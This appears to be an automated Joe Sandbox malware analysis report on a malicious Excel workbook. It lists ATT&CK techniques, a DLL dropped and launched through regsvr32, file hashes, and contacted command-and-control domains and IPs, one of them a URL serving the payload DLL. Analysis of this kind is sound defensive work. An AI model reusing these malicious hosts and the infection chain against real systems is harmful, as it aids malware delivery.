              Default Accounts | Scripting 1 | Boot or Logon Initialization Scripts | DLL Side-Loading 1 | Disable or Modify Tools 1 | LSASS Memory | Query Registry 1 | Remote Desktop Protocol | Data from Removable Media | Exfiltration Over Bluetooth | Ingress Tool Transfer 3 | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout
              Domain Accounts | Native API 2 | Logon Script (Windows) | Logon Script (Windows) | Virtualization/Sandbox Evasion 1 | Security Account Manager | Security Software Discovery 13 | SMB/Windows Admin Shares | Data from Network Shared Drive | Automated Exfiltration | Non-Application Layer Protocol 3 | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data
              Local Accounts | Exploitation for Client Execution 4 | Logon Script (Mac) | Logon Script (Mac) | Process Injection 12 | NTDS | Virtualization/Sandbox Evasion 1 | Distributed Component Object Model | Input Capture | Scheduled Transfer | Application Layer Protocol 4 | SIM Card Swap |  | Carrier Billing Fraud
              Cloud Accounts | Cron | Network Logon Script | Network Logon Script | Deobfuscate/Decode Files or Information 1 | LSA Secrets | Process Discovery 1 | SSH | Keylogging | Data Transfer Size Limits | Fallback Channels | Manipulate Device Communication |  | Manipulate App Store Rankings or Ratings
              Replication Through Removable Media | Launchd | Rc.common | Rc.common | Scripting 1 | Cached Domain Credentials | Remote System Discovery 1 | VNC | GUI Input Capture | Exfiltration Over C2 Channel | Multiband Communication | Jamming or Denial of Service |  | Abuse Accessibility Features
              External Remote Services | Scheduled Task | Startup Items | Startup Items | Obfuscated Files or Information 2 | DCSync | File and Directory Discovery 1 | Windows Remote Management | Web Portal Capture | Exfiltration Over Alternative Protocol | Commonly Used Port | Rogue Wi-Fi Access Points |  | Data Encrypted for Impact
              Drive-by Compromise | Command and Scripting Interpreter | Scheduled Task/Job | Scheduled Task/Job | Regsvr32 1 | Proc Filesystem | System Information Discovery 125 | Shared Webroot | Credential API Hooking | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Application Layer Protocol | Downgrade to Insecure Protocols |  | Generate Fraudulent Advertising Revenue
              Exploit Public-Facing Application | PowerShell | At (Linux) | At (Linux) | DLL Side-Loading 1 | /etc/passwd and /etc/shadow | System Network Connections Discovery | Software Deployment Tools | Data Staged | Exfiltration Over Asymmetric Encrypted Non-C2 Protocol | Web Protocols | Rogue Cellular Base Station |  | Data Destruction

              Behavior Graph

              [Behavior graph: ID 433009, sample my_attach_82862.xlsb, start date 11/06/2021, architecture WINDOWS, score 100]


              Antivirus, Machine Learning and Genetic Malware Detection

              Initial Sample

              No Antivirus matches

              Dropped Files

              Source | Detection | Scanner | Label
              C:\Users\Public\SettingSyncY.dll | 6% | Metadefender |
              C:\Users\Public\SettingSyncY.dll | 4% | ReversingLabs |
              C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\soft[1].dll | 6% | Metadefender |
              C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\soft[1].dll | 4% | ReversingLabs |

              Unpacked PE Files

              Source | Detection | Scanner | Label
              3.2.regsvr32.exe.3010000.1.unpack | 100% | Avira | HEUR/AGEN.1108168

              Domains

              Source | Detection | Scanner | Label
              authd.feronok.com | 11% | Virustotal |
              app.bighomegl.at | 7% | Virustotal |
              quickbooks.aeymotors.com | 3% | Virustotal |

              URLs


              Domains and IPs

              Contacted Domains

              Name | IP | Active | Malicious | Antivirus Detection | Reputation
              authd.feronok.com | 185.233.80.31 | true | true |  | unknown
              app.bighomegl.at | 185.233.80.31 | true | true |  | unknown
              quickbooks.aeymotors.com | 50.87.220.158 | true | false |  | unknown

              Contacted URLs

              Name | Malicious | Antivirus Detection | Reputation
              http://authd.feronok.com/c0Zjvpk_/2BhHkEQKFoUb3aKx_2FuhQ9/zz1UpsMDGJ/MqFrowSgYmc2fzVA2/yf5xhKlVBQKb/rwrgpqZOvNV/mxBLQ1oxc7jv8k/5tQFefyNUnYTHJj33dQKu/YqZyqYfZuaOHFPro/3D3_2B6kK9arKKX/Wf1dZBj8QqS_2BWWVF/B7Ahpx3M5/Q3B93_2FcSTrCmxypMPT/8JVp8AUZzhfuucVY_2B/wCiIRjjYq_2FqoNLK9B6bf/0aSehXg9FwafT/cgt8pMOQ/HbDCojQOV1FVprYRnxx13U1/UwN8_2B_2F/vzILJE71SBej4gvGi/FIWIlMn9n/L3 | true | Avira URL Cloud: safe | unknown
              http://authd.feronok.com/Nqnk1j8Pq1gJEs1x5F/Dd1hhfQAv/jtmHiVvgoBkcYEwLzLyA/C5p24Ce9YgRZRzxsjjD/nxl_2BdpzYbVr0QWXmBP9v/GO1k2SCoSQjXR/yxhwTnmC/pDIJ9c_2Bm_2FrJ_2B9wee3/JVSl6ysora/rGjwo8YPYfbP9mT94/HzBvhbCiqM7B/Bi1eHCPiGVL/46J0oLxANcfziq/thqSh_2Bozif3G_2Fo_2F/k6b3HZTG7RK0p_2F/ovJUD_2BB3IEisf/V1SwB6D9ZycfRmjdXo/1wtqe3ptL/omd3M4svRRs8_2F1Zp8h/fMxrdwrQxKRQQ81i3US/ttoCJ | true | Avira URL Cloud: safe | unknown

              URLs from Memory and Binaries

                                                                                      https://ncus.contentsync.D18DB67F-C32A-4E79-9062-0C1A4F78D8FB.0.drfalse
                                                                                      • URL Reputation: safe
                                                                                      • URL Reputation: safe
                                                                                      • URL Reputation: safe
                                                                                      unknown
                                                                                      https://onedrive.live.com/about/download/?windows10SyncClientInstalled=falseD18DB67F-C32A-4E79-9062-0C1A4F78D8FB.0.drfalse
                                                                                        high
                                                                                        https://webdir.online.lync.com/autodiscover/autodiscoverservice.svc/root/D18DB67F-C32A-4E79-9062-0C1A4F78D8FB.0.drfalse
                                                                                          high
                                                                                          http://weather.service.msn.com/data.aspxD18DB67F-C32A-4E79-9062-0C1A4F78D8FB.0.drfalse
                                                                                            high
                                                                                            https://apis.live.net/v5.0/D18DB67F-C32A-4E79-9062-0C1A4F78D8FB.0.drfalse
                                                                                            • URL Reputation: safe
                                                                                            • URL Reputation: safe
                                                                                            • URL Reputation: safe
                                                                                            unknown
                                                                                            https://officemobile.uservoice.com/forums/929800-office-app-ios-and-ipad-asksD18DB67F-C32A-4E79-9062-0C1A4F78D8FB.0.drfalse
                                                                                              high
                                                                                              https://word.uservoice.com/forums/304948-word-for-ipad-iphone-iosD18DB67F-C32A-4E79-9062-0C1A4F78D8FB.0.drfalse
                                                                                                high
                                                                                                https://autodiscover-s.outlook.com/autodiscover/autodiscover.xmlD18DB67F-C32A-4E79-9062-0C1A4F78D8FB.0.drfalse
                                                                                                  high
                                                                                                  https://management.azure.comD18DB67F-C32A-4E79-9062-0C1A4F78D8FB.0.drfalse
                                                                                                    high
                                                                                                    https://wus2.contentsync.D18DB67F-C32A-4E79-9062-0C1A4F78D8FB.0.drfalse
                                                                                                    • URL Reputation: safe
                                                                                                    • URL Reputation: safe
                                                                                                    • URL Reputation: safe
                                                                                                    unknown
                                                                                                    https://incidents.diagnostics.office.comD18DB67F-C32A-4E79-9062-0C1A4F78D8FB.0.drfalse
                                                                                                      high
                                                                                                      https://clients.config.office.net/user/v1.0/iosD18DB67F-C32A-4E79-9062-0C1A4F78D8FB.0.drfalse
                                                                                                        high
                                                                                                        https://insertmedia.bing.office.net/odc/insertmediaD18DB67F-C32A-4E79-9062-0C1A4F78D8FB.0.drfalse
                                                                                                          high
                                                                                                          https://o365auditrealtimeingestion.manage.office.comD18DB67F-C32A-4E79-9062-0C1A4F78D8FB.0.drfalse
                                                                                                            high
                                                                                                            https://outlook.office365.com/api/v1.0/me/ActivitiesD18DB67F-C32A-4E79-9062-0C1A4F78D8FB.0.drfalse
                                                                                                              high
                                                                                                              https://api.office.netD18DB67F-C32A-4E79-9062-0C1A4F78D8FB.0.drfalse
                                                                                                                high
                                                                                                                https://incidents.diagnosticssdf.office.comD18DB67F-C32A-4E79-9062-0C1A4F78D8FB.0.drfalse
                                                                                                                  high
                                                                                                                  https://asgsmsproxyapi.azurewebsites.net/D18DB67F-C32A-4E79-9062-0C1A4F78D8FB.0.drfalse
                                                                                                                  • Avira URL Cloud: safe
                                                                                                                  unknown
                                                                                                                  https://clients.config.office.net/user/v1.0/android/policiesD18DB67F-C32A-4E79-9062-0C1A4F78D8FB.0.drfalse
                                                                                                                    high
                                                                                                                    http://www.amazon.com/msapplication.xml.20.drfalse
                                                                                                                      high
                                                                                                                      https://entitlement.diagnostics.office.comD18DB67F-C32A-4E79-9062-0C1A4F78D8FB.0.drfalse
                                                                                                                        high
                                                                                                                        https://pf.directory.live.com/profile/mine/WLX.Profiles.IC.jsonD18DB67F-C32A-4E79-9062-0C1A4F78D8FB.0.drfalse
                                                                                                                          high
                                                                                                                          http://www.twitter.com/msapplication.xml5.20.drfalse
                                                                                                                            high
                                                                                                                            https://outlook.office.com/D18DB67F-C32A-4E79-9062-0C1A4F78D8FB.0.drfalse
                                                                                                                              high
                                                                                                                              https://storage.live.com/clientlogs/uploadlocationD18DB67F-C32A-4E79-9062-0C1A4F78D8FB.0.drfalse
                                                                                                                                high
                                                                                                                                https://templatelogging.office.com/client/logD18DB67F-C32A-4E79-9062-0C1A4F78D8FB.0.drfalse
                                                                                                                                  high
                                                                                                                                  https://outlook.office365.com/D18DB67F-C32A-4E79-9062-0C1A4F78D8FB.0.drfalse
                                                                                                                                    high
                                                                                                                                    https://webshell.suite.office.comD18DB67F-C32A-4E79-9062-0C1A4F78D8FB.0.drfalse
                                                                                                                                      high
                                                                                                                                      https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=OneDriveD18DB67F-C32A-4E79-9062-0C1A4F78D8FB.0.drfalse
                                                                                                                                        high
                                                                                                                                        http://authd.feronok.com/c0Zjvpk_/2BhHkEQKFoUb3aKx_2FuhQ9/zz1UpsMDGJ/MqFrowSgYmc2fzVA2/yf5xhKlVBQKb/{B403EC44-CAAD-11EB-90E4-ECF4BB862DED}.dat.29.drtrue
                                                                                                                                        • Avira URL Cloud: safe
                                                                                                                                        unknown
                                                                                                                                        https://management.azure.com/D18DB67F-C32A-4E79-9062-0C1A4F78D8FB.0.drfalse
                                                                                                                                          high
                                                                                                                                          https://login.windows.net/common/oauth2/authorizeD18DB67F-C32A-4E79-9062-0C1A4F78D8FB.0.drfalse
                                                                                                                                            high
                                                                                                                                            https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFileD18DB67F-C32A-4E79-9062-0C1A4F78D8FB.0.drfalse
                                                                                                                                            • URL Reputation: safe
                                                                                                                                            • URL Reputation: safe
                                                                                                                                            • URL Reputation: safe
                                                                                                                                            unknown
                                                                                                                                            https://graph.windows.net/D18DB67F-C32A-4E79-9062-0C1A4F78D8FB.0.drfalse
                                                                                                                                              high
                                                                                                                                              https://api.powerbi.com/beta/myorg/importsD18DB67F-C32A-4E79-9062-0C1A4F78D8FB.0.drfalse
                                                                                                                                                high
                                                                                                                                                https://devnull.onenote.comD18DB67F-C32A-4E79-9062-0C1A4F78D8FB.0.drfalse
                                                                                                                                                  high
                                                                                                                                                  https://ncus.pagecontentsync.D18DB67F-C32A-4E79-9062-0C1A4F78D8FB.0.drfalse
                                                                                                                                                  • URL Reputation: safe
                                                                                                                                                  • URL Reputation: safe
                                                                                                                                                  • URL Reputation: safe
                                                                                                                                                  unknown
                                                                                                                                                  https://r4.res.office365.com/footprintconfig/v1.7/scripts/fpconfig.jsonD18DB67F-C32A-4E79-9062-0C1A4F78D8FB.0.drfalse
                                                                                                                                                    high
                                                                                                                                                    https://messaging.office.com/D18DB67F-C32A-4E79-9062-0C1A4F78D8FB.0.drfalse
                                                                                                                                                      high
                                                                                                                                                      https://dataservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFileD18DB67F-C32A-4E79-9062-0C1A4F78D8FB.0.drfalse
                                                                                                                                                        high
                                                                                                                                                        https://augloop.office.com/v2D18DB67F-C32A-4E79-9062-0C1A4F78D8FB.0.drfalse
                                                                                                                                                          high
                                                                                                                                                          https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=BingD18DB67F-C32A-4E79-9062-0C1A4F78D8FB.0.drfalse
                                                                                                                                                            high
                                                                                                                                                            https://quickbooks.aeymotors.com/soft.dllsharedStrings.bintrue
                                                                                                                                                            • Avira URL Cloud: malware
                                                                                                                                                            unknown
                                                                                                                                                            https://skyapi.live.net/Activity/D18DB67F-C32A-4E79-9062-0C1A4F78D8FB.0.drfalse
                                                                                                                                                            • URL Reputation: safe
                                                                                                                                                            • URL Reputation: safe
                                                                                                                                                            • URL Reputation: safe
                                                                                                                                                            unknown
                                                                                                                                                            https://clients.config.office.net/user/v1.0/macD18DB67F-C32A-4E79-9062-0C1A4F78D8FB.0.drfalse
                                                                                                                                                              high

                                                                                                                                                              Contacted IPs


                                                                                                                                                              Public

IP | Domain | Country | ASN | ASN Name | Malicious
185.233.80.31 | authd.feronok.com | Russian Federation | 50113 | SUPERSERVERSDATACENTERRU | true
50.87.220.158 | quickbooks.aeymotors.com | United States | 46606 | UNIFIEDLAYER-AS-1US | false

                                                                                                                                                              General Information

Joe Sandbox Version: 32.0.0 Black Diamond
Analysis ID: 433009
Start date: 11.06.2021
Start time: 05:05:46
Joe Sandbox Product: CloudBasic
Overall analysis duration: 0h 8m 30s
Hypervisor based Inspection enabled: false
Report type: full
Sample file name: my_attach_82862.xlsb
Cookbook file name: defaultwindowsofficecookbook.jbs
Analysis system description: Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of analysed new started processes analysed: 46
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• HDC enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Detection: MAL
Classification: mal100.troj.expl.evad.winXLSB@15/67@7/2
EGA Information:
• Successful, ratio: 100%
HDC Information:
• Successful, ratio: 4.7% (good quality ratio 4.4%)
• Quality average: 80.4%
• Quality standard deviation: 27.6%
HCA Information: Failed
Cookbook Comments:
• Adjust boot time
• Enable AMSI
• Found application associated with file extension: .xlsb
• Found Word or Excel or PowerPoint or XPS Viewer
• Attach to Office via COM
• Scroll down
• Close Viewer
Warnings:
                                                                                                                                                              • Exclude process from analysis (whitelisted): taskhostw.exe, MpCmdRun.exe, RuntimeBroker.exe, backgroundTaskHost.exe, UsoClient.exe, audiodg.exe, BackgroundTransferHost.exe, ielowutil.exe, WMIADAP.exe, SgrmBroker.exe, conhost.exe, WmiPrvSE.exe, svchost.exe, wuapihost.exe
                                                                                                                                                              • Not all processes were analyzed, report is missing behavior information
                                                                                                                                                              • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                                                                              • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                                                              • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                                                                              • Report size getting too big, too many NtQueryValueKey calls found.

                                                                                                                                                              Simulations

                                                                                                                                                              Behavior and APIs

                                                                                                                                                              Time:05:09:28
                                                                                                                                                              Type:API Interceptor
                                                                                                                                                              Description:1x Sleep call for process: regsvr32.exe modified

                                                                                                                                                              Joe Sandbox View / Context

                                                                                                                                                              IPs

                                                                                                                                                              Match:185.233.80.31
                                                                                                                                                              Associated Sample Name / URL:SecuriteInfo.com..7135.dll
                                                                                                                                                              Detection:malicious

                                                                                                                                                                Domains


                                                                                                                                                                ASN


                                                                                                                                                                JA3 Fingerprints


                                                                                                                                                                Dropped Files

                                                                                                                                                                No context

                                                                                                                                                                Created / dropped Files

                                                                                                                                                                C:\Users\Public\SettingSyncY.dll
                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):886272
                                                                                                                                                                Entropy (8bit):5.674513513570937
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:24576:Ydk22FB2tfgklpVM5HdBcvLrXmF63WaSc:YdkDT29zaVg3WaSc
                                                                                                                                                                MD5:5BA7AC7FA4F9E831679832B6CC22AEE8
                                                                                                                                                                SHA1:813DF24AC22C2666B28BC3E7FB9BD1EEF2A7F395
                                                                                                                                                                SHA-256:D2C19AC3EACE29239BF919C442556ABF782DA5953325EE6B2626482FBF442F29
                                                                                                                                                                SHA-512:A345B0749D5745640FD7908CDB142960DA22AC6029BAFDDC0666D11EB5033756C3CFDE84D2FB94DCBF418DF40D2CE49EC4A18B919714402B7045B96E619A27CD
                                                                                                                                                                Malicious:true
                                                                                                                                                                Antivirus:
• Antivirus: Metadefender, Detection: 6%
                                                                                                                                                                • Antivirus: ReversingLabs, Detection: 4%
                                                                                                                                                                Reputation:low
                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\RecoveryStore.{99BBC3EB-CAAD-11EB-90E4-ECF4BB862DED}.dat
                                                                                                                                                                Process:C:\Program Files\internet explorer\iexplore.exe
                                                                                                                                                                File Type:Microsoft Word Document
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):29272
                                                                                                                                                                Entropy (8bit):1.7725011658677239
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:48:IwhoGcprPzGwpLhaG/ap8GBGIpcgdihI1GvnZpvgdih4Goo1qp9gdihRGo4cEZpo:rmZlZa2IW0Gt0nf09lM0wQBgB
                                                                                                                                                                MD5:FD403206FBACF7BA1922FFEB229A78E9
                                                                                                                                                                SHA1:002B50B3B9B71BAF1D82B31E35987F42572A00A5
                                                                                                                                                                SHA-256:AB6C3DCC02DB8F8214D71C9249B0DFDC4C0F215ADF18F158A835B4A85E9B50DA
                                                                                                                                                                SHA-512:47B4E2A4EEADFDBB43B5317A114BDEEA051E184FFE9D52CF13BF60C14963FC1C7D04B8AC2230589028068416F77C62A8B4F337C61A0EC173B021E4DBCA8A530F
                                                                                                                                                                Malicious:false
                                                                                                                                                                Reputation:low
                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\RecoveryStore.{B403EC42-CAAD-11EB-90E4-ECF4BB862DED}.dat
                                                                                                                                                                Process:C:\Program Files\internet explorer\iexplore.exe
                                                                                                                                                                File Type:Microsoft Word Document
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):29272
                                                                                                                                                                Entropy (8bit):1.7731605803059567
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:48:IwpGcproGwpLByG/ap8BP7GIpcBRA5GvnZpvBRAHGo2qp9BRARGo4lpmBRnjGWEE:rvZwZe2/WPbtP6fPxlMPpz4EB
                                                                                                                                                                MD5:8B153FC719E2A3E5D5199D05526C1B0B
                                                                                                                                                                SHA1:9E8B931ABFC5730E7E12E9CC2337102C868B66CF
                                                                                                                                                                SHA-256:6BFC1E01DAD1EC91AE4753B1C5F0C423A18B022CD638A23E0546B87F8CE52A38
                                                                                                                                                                SHA-512:AA7792863EF894CBFDF4AA8ECEE90B785BC6FF2B84FF783BDCE5797114E6FA4550FD38BAA07D6D894B555C47857CB9875452FAB1267F0218AC688C99C13B92AB
                                                                                                                                                                Malicious:false
                                                                                                                                                                Reputation:low
                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\RecoveryStore.{C1F50A27-CAAD-11EB-90E4-ECF4BB862DED}.dat
                                                                                                                                                                Process:C:\Program Files\internet explorer\iexplore.exe
                                                                                                                                                                File Type:Microsoft Word Document
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):29272
                                                                                                                                                                Entropy (8bit):1.7753706536991711
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:48:IwmEGcprEvGwpLp2G/ap8L9GIpchDNBGvnZpvhDsXGoalq1qp9hDXnWGo4GlqOly:rmYZEZZp02LvWhxOthHfh7RxMh1coXuB
                                                                                                                                                                MD5:45CE2DF9248F6EC1A9F3E0A8354CA162
                                                                                                                                                                SHA1:18E7FA0CC9C5ACEAB87D701AA684C51132237CAA
                                                                                                                                                                SHA-256:D0D79EB236F673501C6B2142B0E0C8786F3665D4241944DE2F993D3E160230EF
                                                                                                                                                                SHA-512:4BE21DF11415B8E7F6F9071BE63A2F5EB35DC68127769B66EAFCA83DB2BF6B877ABCE9AFCF212A546889824062105778D79C31001D9A1256FCF481000A0847C2
                                                                                                                                                                Malicious:false
                                                                                                                                                                Reputation:low
                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\RecoveryStore.{CFEFB1DC-CAAD-11EB-90E4-ECF4BB862DED}.dat
                                                                                                                                                                Process:C:\Program Files\internet explorer\iexplore.exe
                                                                                                                                                                File Type:Microsoft Word Document
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):29272
                                                                                                                                                                Entropy (8bit):1.7760345703977574
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:48:IwxGcprIGwpL8G/ap88clhGIpc8+FRGvnZpv8+FPGodqp98+FNGo4hpm8+2CGWne:rHZQZ+2ZljWPAtPyfP0hMPHcgOB
                                                                                                                                                                MD5:CD681ED6E3AB41F9B2BC5DD6D8FFF1EE
                                                                                                                                                                SHA1:3E384D392345F855F4744B727DA329BDEE4F5A01
                                                                                                                                                                SHA-256:93E4EDC208F1351F9BA4C9ADC6A25282744F23CA333270409F11A1B77E5CE594
                                                                                                                                                                SHA-512:FE70E480B75873D80E5CB03A8200419559AF7DE2E675637FE9512418D0BE0935F09B40CABE3ABBB370B34224365C0820A66011AC8B3589B057FD57357E4FB67F
                                                                                                                                                                Malicious:false
                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\{99BBC3ED-CAAD-11EB-90E4-ECF4BB862DED}.dat
                                                                                                                                                                Process:C:\Program Files\internet explorer\iexplore.exe
                                                                                                                                                                File Type:Microsoft Word Document
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):27576
                                                                                                                                                                Entropy (8bit):1.9130107085336352
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:96:rCZpQp6nBS/jp2xWmMGiUg3DTDp75ksg3DTDp7FCA:rCZpQp6nk/jp2xWmMGxYzp75lYzp7kA
                                                                                                                                                                MD5:A8EF5B0FD756BE9A78CFC806E96CE89C
                                                                                                                                                                SHA1:9296E6BB2974CE1A339E0AE36ED537F91A59D0EB
                                                                                                                                                                SHA-256:308836901656334D15ADA144BC333223C8AC95AA5C861BE928C961160EC83F77
                                                                                                                                                                SHA-512:45ED4601AC2859B1992EC7AF17ABCDB4370C62BEB17A21FD32FA9BEF0233DB593D1297E7CA25EFABEE74D6F2D80A1F47DE6A525A93582A88AAE73B992FBC581E
                                                                                                                                                                Malicious:false
                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\{B403EC44-CAAD-11EB-90E4-ECF4BB862DED}.dat
                                                                                                                                                                Process:C:\Program Files\internet explorer\iexplore.exe
                                                                                                                                                                File Type:Microsoft Word Document
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):27588
                                                                                                                                                                Entropy (8bit):1.914931709058199
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:192:rSZTVQR63kDjd2FWlM5VLMPKV5BFVLMPKV5YsA:rO+s0PUcmHL8KVLL8KVWH
                                                                                                                                                                MD5:EC0378B9FD41FFC29F2D39AB7457E30B
                                                                                                                                                                SHA1:4699E57B1EEEC0AC8C39CFC52AF428F9379F9E6F
                                                                                                                                                                SHA-256:BFAF1575FBDA07B353E1A828C018FC9B5EE9A3F083B21222E653C97BB96B8111
                                                                                                                                                                SHA-512:30AE3D2843D90FBE25749603C668503A3530942D6BBAAA066D2232FC9130B49C7DF3A47F9B9BFB4BE5AF7BE25CE3D135E527EE8FB5173836169308C5DED63B0F
                                                                                                                                                                Malicious:false
                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\{C1F50A29-CAAD-11EB-90E4-ECF4BB862DED}.dat
                                                                                                                                                                Process:C:\Program Files\internet explorer\iexplore.exe
                                                                                                                                                                File Type:Microsoft Word Document
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):28144
                                                                                                                                                                Entropy (8bit):1.9207168531889898
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:192:rnZIQA6ak+jV2ZWJMlZ0cHXGT10c1cHX9A:rZxrz4MISHnHWJn6H+
                                                                                                                                                                MD5:54F420FC6D17AFC3213AC8178D548349
                                                                                                                                                                SHA1:D9931600D39445431E50841406AD061FC2649C44
                                                                                                                                                                SHA-256:429B50DBA0BF58729F62240F0A6F07980A4399B6AB4715DAD8E7D0DFA9BF448F
                                                                                                                                                                SHA-512:79D5F396F0B3A4AE0CCC48E3D47AF50D0E1FDF6980DFA1E8C532E86F878C9A0189055EA508318599D994FA7BB4EE9E3F6DB682D39CF8A6AB1D6858073B3F73F2
                                                                                                                                                                Malicious:false
                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\{CFEFB1DE-CAAD-11EB-90E4-ECF4BB862DED}.dat
                                                                                                                                                                Process:C:\Program Files\internet explorer\iexplore.exe
                                                                                                                                                                File Type:Microsoft Word Document
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):27592
                                                                                                                                                                Entropy (8bit):1.918492100727991
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:96:ruZtQsA6WUBSTlbjh2USWYMQBc4UOolc4UOZA:ruZtQ16LkT1jh2ZWYMQBcROolcROZA
                                                                                                                                                                MD5:79D56166307B15993F3386A3A638376C
                                                                                                                                                                SHA1:A91AD9DAF8050BFFAFE18622F144902233ADFCA7
                                                                                                                                                                SHA-256:4A7A62EAF46954B9853038B0A7ACF3F68EF90704C589472AB9E41E7477286AF1
                                                                                                                                                                SHA-512:C9829231BEAEBE5C3A4B4529EE04D15EBE445BFB83F73829AD37C5EEA5F468397F1C7A9947ACCE9494B277FE57082A688E2028B08F86B949F28B00E46930B074
                                                                                                                                                                Malicious:false
                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin-17529550060\msapplication.xml
                                                                                                                                                                Process:C:\Program Files\internet explorer\iexplore.exe
                                                                                                                                                                File Type:XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):656
                                                                                                                                                                Entropy (8bit):5.117856519163228
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:12:TMHdNMNxOEV3N3TnWimI002EtM3MHdNMNxOEV3N3TnWimI00ObVbkEtMb:2d6NxOU3N3TSZHKd6NxOU3N3TSZ76b
                                                                                                                                                                MD5:621EB656303E8270283EABFCF11F9854
                                                                                                                                                                SHA1:6526C70DE9143018456B6CA4EA35E4F0B8CA88E4
                                                                                                                                                                SHA-256:2920B7AC67CC5F1B544077642FABBC14C8D88CAD1BD0A90D623CC2A208A78500
                                                                                                                                                                SHA-512:8667901B40741E1CB1143A4F298437D50356DDB7A26EAFD255A95EF79FACC14569142544A3EA2EC613C23372F9A06632A146DA188DE96B0FEF95178C027A8892
                                                                                                                                                                Malicious:false
                                                                                                                                                                Preview: <?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.twitter.com/"/><date>0x6fc424e9,0x01d75eba</date><accdate>0x6fc424e9,0x01d75eba</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig>..<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.twitter.com/"/><date>0x6fc424e9,0x01d75eba</date><accdate>0x6fc424e9,0x01d75eba</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Twitter.url"/></tile></msapplication></browserconfig>..
                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin-18270793970\msapplication.xml
                                                                                                                                                                Process:C:\Program Files\internet explorer\iexplore.exe
                                                                                                                                                                File Type:XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):653
                                                                                                                                                                Entropy (8bit):5.106728622068366
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:12:TMHdNMNxe2kZnWimI002EtM3MHdNMNxe2kZnWimI00Obkak6EtMb:2d6NxroSZHKd6NxroSZ7Aa7b
                                                                                                                                                                MD5:D6A6DE7380D449E1E193FF1F7B3F8F9F
                                                                                                                                                                SHA1:28EC605B64FA91700DA2E8E2257AAE98465F5B93
                                                                                                                                                                SHA-256:3D41E628656CE87C4774567A257251E1322DC8CFF7DE8A0A140A62064F77F248
                                                                                                                                                                SHA-512:338E693D50BC2A8C7AACE28A54C5B0AF3D42B46E61657EEE73515D8911A44C0A2328AC171D2A176BA6073B04C65DE482BC8ABDF170B6D5764955FBCF0B4DB18C
                                                                                                                                                                Malicious:false
